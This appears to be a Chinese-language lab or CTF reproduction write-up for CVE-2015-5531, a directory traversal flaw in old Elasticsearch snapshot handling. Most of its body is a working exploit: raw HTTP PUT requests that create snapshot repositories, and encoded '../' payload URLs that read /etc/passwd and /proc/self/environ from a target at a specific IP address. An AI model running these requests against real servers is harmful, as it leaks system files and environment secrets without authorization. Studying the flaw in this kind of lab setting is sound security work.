CVE-2015-5531

漏洞描述：Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎，它主要用于云计算中，并支持通过HTTP使用JSON进行数据索引。
elasticsearch 1.5.1及以前，无需任何配置即可触发该漏洞。之后的新版，配置文件elasticsearch.yml中必须存在path.repo，该配置值为一个目录，且该目录必须可写，等于限制了备份仓库的根位置。不配置该值，默认不启动这个功能。

影响版本：elasticsearch 1.5.1及以前

参考资料：

• https://github.com/pandujar/elasticpwn/blob/master/README-CVE-2015-5531.md
• https://joker-vip.github.io/2021/07/18/ElasticSearch%20%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2015-5531%EF%BC%89/

POC：

http://ip/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

漏洞复现

1. 新建仓库

PUT /_snapshot/test HTTP/1.1
Host:IP:9200
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 110

{
“type”: “fs”,
“settings”: {
“location”: “/usr/share/elasticsearch/repo/test”
}
}

2.新建快照

PUT /_snapshot/test2 HTTP/1.1
Host: IP:9200
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 128

{
“type”: “fs”,
“settings”: {
“location”: “/usr/share/elasticsearch/repo/test/snapshot-backdata”
}
}

3. 使用POC进行读取

• http://123.58.224.8:64253/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

4. 返回的是ASCII码，进行解码即可

• 浏览器控制台输入
• string.fromCharcode()

5. 读取flag

• http://123.58.224.8:64253/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fself%2fenviron